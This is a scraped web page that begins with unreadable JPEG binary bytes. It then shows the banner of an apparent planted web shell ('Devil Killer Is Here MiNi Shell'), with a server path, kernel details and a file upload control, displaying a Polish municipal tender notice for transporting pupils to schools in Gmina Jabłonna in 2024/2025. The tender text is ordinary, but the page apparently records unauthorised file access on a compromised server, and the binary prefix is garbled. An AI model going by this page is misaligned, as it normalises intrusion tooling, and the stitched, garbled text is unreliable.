JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20240809/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20240809/0045323601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczniów do szkół na terenie Gminy Jabłonna wraz z zapewnieniem opieki podczas przewozów, w roku szkolnym 2024/2025 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Jabłonna</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Gmina Jabłonna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019773</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jabłonna-Majatek 22</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jabłonna-Majątek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-114</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@jablonna.lubelskie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ugjablonna.bip.lubelskie.pl/index.php?id=6</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczniów do szkół na terenie Gminy Jabłonna wraz z zapewnieniem opieki podczas przewozów, w roku szkolnym 2024/2025 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4205f1c2-b526-4b9f-b24e-9dc83abb6e75</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00453236</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00045947/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dowóz uczniów do szkół na terenie Gminy Jabłonna wraz z zapewnieniem opieki podczas przewozów, w roku szkolnym 2024/2025</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-4205f1c2-b526-4b9f-b24e-9dc83abb6e75 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">11.1. W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy<br/>e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie<br/>e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów<br/>oraz zasady i warunki korzystania z Platformy e-Zamówienia określa<br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu<br/>oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>11.10. Komunikacja w postępowaniu, z wyłączeniem składania ofert (sposób składania ofert opisano w rozdziale 13 SWZ) odbywa<br/>się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do<br/>komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień,<br/>zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej<br/>wiadomości (przycisk „dodaj załącznik”).<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>Pozostałe informacje odnoszące się do komunikacji znajdują się z rozdziale 11 SWZ</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1.	Administratorem Pana/Pani danych osobowych jest Gmina Jabłonna z siedzibą Jabłonna – Majątek 22, 23-114 Jabłonna – Majątek, tel. 815610570; <br/>2.	Inspektorem Ochrony Danych jest Pan Ryszard Próchnicki, mail: iodug@jablonna.lubelskie.pl 3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie niniejszego zamówienia publicznego <br/>4.	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 ), dalej „ustawa Pzp”; <br/>5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; <br/>6.	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy <br/>Pzp; <br/>7.	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; 8. posiada Pani/Pan: <br/>1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; 2) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **; <br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; 4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; 9. nie przysługuje Pani/Panu: <br/>1)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>2)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>3)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. * Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych. <br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników. <br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IRO.271.34.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem Zamówienia jest usługa dowożenia uczniów do:<br/>- Zespołu Szkół w Jabłonnie - Jabłonna Druga 45, 23-114 Jabłonna Druga,<br/>- Zespołu Szkół w Piotrkowie – Piotrków Pierwszy 105, 23-114 Piotrków Pierwszy,<br/>- Szkoły Podstawowej w Czerniejowie – Czerniejów 130, 23-114 Czerniejów,<br/>- Szkoły Podstawowej w Skrzynicach – Skrzynice Pierwsze 110, 23-114 Skrzynice Pierwsze,<br/>prowadzonych przez Gminę Jabłonna, na podstawie biletów miesięcznych w roku szkolnym 2024/2025, wraz z<br/>zapewnieniem opieki. Usługa dowożenia polega na transporcie uczniów z miejsca zamieszkania (tj. przystanków) do szkół<br/>oraz transporcie po zajęciach do miejsca zamieszkania.<br/>Zamówienie obejmuje następujące trasy i następującą liczbę uczniów:<br/>Trasa 1 – Przewóz uczniów do Zespołu Szkół w Jabłonnie na trasie: Wierciszów – Jabłonna Druga– 18 uczniów<br/>Trasa 2 - Przewóz uczniów do Zespołu Szkół w Jabłonnie na trasie: Jabłonna-Majątek – Jabłonna Druga– 17 uczniów<br/>Trasa 3 – Przewóz uczniów do Zespołu Szkół w Piotrkowie na trasie: Skrzynice - Chmiel-Kolonia - Chmiel – Piotrków –60<br/>uczniów (w tym 1 dziecko 5-letnie), dwa autobusy, jeden jadący przez Skrzynice-Chmiel- Wolnica- Piotrków, drugi Chmiel-<br/>Kolonia – Chmiel- Piotrków).<br/>Trasa 4 – Przewóz uczniów do Zespołu Szkół w Piotrkowie na trasie: Piotrkówek – Piotrków – 14 uczniów (w tym 3 dzieci<br/>pięcioletnich),<br/>Trasa 5 – Przewóz uczniów do Szkoły Podstawowej w Czerniejowie na trasie: Skrzynice Pierwsze - Chmiel-Kolonia –<br/>Skrzynice Kolonia – Czerniejów - 25 uczniów( w tym 2 dzieci pięcioletnich)<br/>Trasa 6 – Przewóz uczniów do Szkoły Podstawowej w Skrzynicach na trasie: Skrzynice Pierwsze/Skrzynice Kolonia –<br/>Skrzynice Pierwsze – 0 uczniów objętych dowożeniem.<br/>Jednakże Zamawiający wymaga aby Wykonawca w formularzu ofertowym wycenił cenę jednego biletu dla dziecka oraz<br/>cenę jednego biletu dla na tej trasie. Ceny te nie będą wchodziły w skład oferty, a są jedynie informacją dla Zamawiającego i<br/>Wykonawcy na wypadek pojawienia się na tej trasie ucznia objętego dowozem w ciągu roku szkolnego.<br/>Zamawiający zastrzega sobie możliwość zmiany przebiegu tras, godzin odjazdu, liczby przewożonych uczniów<br/>wynikających ze zmian organizacyjnych w szkołach, których nie można było przewidzieć w chwili zawarcia umowy.<br/>Dowóz i odwóz odbywać się będzie w dniach nauki szkolnej od poniedziałku do piątku w czasie od 15 do 30 minut przed<br/>rozpoczęciem i po zakończeniu zajęć, z wyłączeniem dni ustawowo wolnych od zajęć szkolnych. W przypadku odpracowywania zajęć szkolnych w innym dniu wolnym od zajęć Wykonawca zobowiązany jest zapewnić przewóz dzieci<br/>zgodnie z rozkładem jazdy ustalonym przez Zamawiającego. W przypadku organizacji zajęć dodatkowych w dniach nauki<br/>szkolnej, w godzinach popołudniowych (andrzejki, choinka, zabawa karnawałowa, rekolekcje), Wykonawca zobowiązany<br/>jest zapewnić przewóz dzieci zgodnie z rozkładem jazdy ustalonym przez Zamawiającego.<br/>Szczegółowe rozkłady jazdy będą dokładnie ustalane z wybranym Wykonawcą i bezpośrednio z dyrektorem danej szkoły w<br/>terminie do 25 października 2022 r. W każdym miesiącu szkoła sporządzi imienny wykaz uczniów uprawnionych do<br/>dowożenia. W zależności od sytuacji losowych liczba uczniów w poszczególnych miesiącach roku szkolnego może ulec<br/>zmianie, zmiana ta będzie powodować zmianę w imiennym wykazie uczniów. W związku z tym przewiduje się możliwość<br/>zmiany miesięcznego wynagrodzenia za wykonaną usługę. Miejscem wsiadania i wysiadania uczniów są istniejące<br/>przystanki autobusowe.<br/>Zamawiający zastrzega sobie możliwość wprowadzenia na określone dni innego niż ustalony rozkład jazdy po<br/>wcześniejszym powiadomieniu Wykonawcy. Nadzór nad przewożonymi uczniami (poprzez odrębną od kierowcy osobę)<br/>szczególnie pod względem zapewnienia bezpieczeństwa, opieki nad uczniami przy wsiadaniu, wysiadaniu i podczas<br/>przejazdu, sprawdzaniu stanu liczbowego uczniów wewnątrz pojazdu należy do Wykonawcy. Pojazdy dowożące dzieci<br/>powinny być sprawne technicznie (w tym działające ogrzewanie), z homologacją, aktualnym OC i NW. Wszystkie dowożone<br/>dzieci muszą mieć zapewnione miejsca siedzące. Każdy z autobusów powinien być wyposażony w środek łączności<br/>pomiędzy kierowcą autobusu, a dyspozytorem przewoźnika, który utrzymywać będzie łączność z Zespołem<br/>Administracyjnym Szkół w Jabłonnie i dyrektorami szkół.<br/>Zamawiający wymaga, aby Wykonawca wycenił również koszt dowozu dzieci busem mieszczącym 20 osób na odległości<br/>łącznie 1000 km.<br/>Zamawiający zamierza wykorzystać przejazd powyższego 1000 km w ciągu roku szkolnego 2023/2024 w celu dowozu<br/>dzieci np. na zawody sportowe itp.<br/>Rzeczywista liczba uczniów objętych przewozem w ramach niniejszego zamówienia, czyli faktyczna liczba biletów<br/>miesięcznych, będzie wynikała z sytuacji demograficznej, organizacji sieci szkół oraz obowiązujących przepisów prawa (np.<br/>objęcie przewozem lub wyłączenie z przewozu określonych grup uczniów). Zwiększenie ilości przewożonych uczniów o nie<br/>więcej niż 20% w stosunku do danych określonych w SWZ nie stanowi podstawy do zamiany warunków świadczenia usług.<br/>UWAGA: Wykonawca musi zapewnić odrębne autobusy w wymaganej ilości dla każdej trasy zamówienia. Nie jest<br/>dopuszczalne realizowanie wielu tras zamówienia jednym – tym samym autobusem. Autobusy muszą posiadać liczbę<br/>miejsc siedzących, która umożliwi transport wszystkich osób na miejscach siedzących.<br/>Zamawiający nie dopuszcza składania ofert częściowych.<br/>Usługi będą świadczone przy użyciu środków transportu spełniających wymagane warunki techniczne, w sposób zgodny z<br/>odpowiednimi przepisami prawa, zapewniający maksymalne bezpieczeństwo, higienę i wygodę przewożonych osób.<br/>Pojazdy muszą być sprawne technicznie. Niedopuszczalne jest np.: przedostawanie się do wnętrza pojazdu spalin i innych<br/>nieprzyjemnych zapachów pochodzących od pracującego silnika lub innych podzespołów pojazdu, wyciekanie oleju lub<br/>paliwa.<br/>Pojazdy muszą spełniać wymagania techniczne określone ustawą z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (Dz.<br/>U. z 2018r., poz. 79 z późń. zmian.) oraz Rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002r. w sprawie<br/>warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2016r., poz. 2022)<br/>Wielkość pojazdu dowożącego uczniów musi być dostosowana do liczby przewożonych uczniów, zgodnie z §22 ust. 1 pkt 5<br/>Rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002r. w sprawie warunków technicznych pojazdów oraz ich<br/>niezbędnego wyposażenia (Dz. U. z 2016r. poz. 2022).<br/>Wykonawca zamówienia musi zapewnić odpowiednią liczbę miejsc siedzących w autobusach - odpowiednio dla danej trasy.<br/>Podczas przejazdu uczniowie muszą mieć zapewnione miejsca siedzące. Czas przebywania dzieci w podróży powinien być<br/>możliwie jak najkrótszy, nie dłuższy niż 40 minut. <br/>Wykonawca zobowiązuje się do zachowania szczególnej staranności w czasie przewozu dzieci i młodzieży z<br/>uwzględnieniem obowiązujących zasad bezpieczeństwa, ze szczególnym zwróceniem uwagi na bezpieczne wsiadanie i<br/>wysiadanie z autobusu.<br/>Wykonawca zobowiązany jest do zapewnienia bezpieczeństwa uczniów w czasie dowozu i w drodze powrotnej.<br/>Transport dzieci musi być przeprowadzony ze sprawowaniem opieki nad dziećmi (na każdej trasie) w czasie ich przewozu,<br/>jak również w trakcie ich wsiadania i wysiadania. Wykonawca zobowiązany jest przed rozpoczęciem dowozów dostarczyć<br/>Zamawiającemu dokumenty dotyczące zatrudnionych opiekunów dowozu: oświadczenie opiekuna o niekaralności,<br/>kserokopia zaświadczenia o odbyciu szkolenia BHP. Zamawiający nie dopuszcza pełnienia przez jedną osobę funkcji<br/>kierowcy i opiekuna uczniów </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60112000-6 - Usługi w zakresie publicznego transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za pomocą kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Warunek będzie spełniony jeżeli Wykonawca dysponuje ważną licencją lub obowiązującym zezwoleniem na wykonywanie krajowego transportu drogowego osób zgodnie z art. 7 ustawy z dnia 6 września 2001 roku o transporcie drogowym (t.j. Dz. U. z 2019 r., poz. 2140, z późn. zm.). Przy ocenie spełnienia tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, posiadanie uprawnień, o których mowa powyżej, jest wymagane od każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia w takim zakresie, w jakim będą oni wykonywać usługę. <br/><br/>3)	sytuacji ekonomicznej i 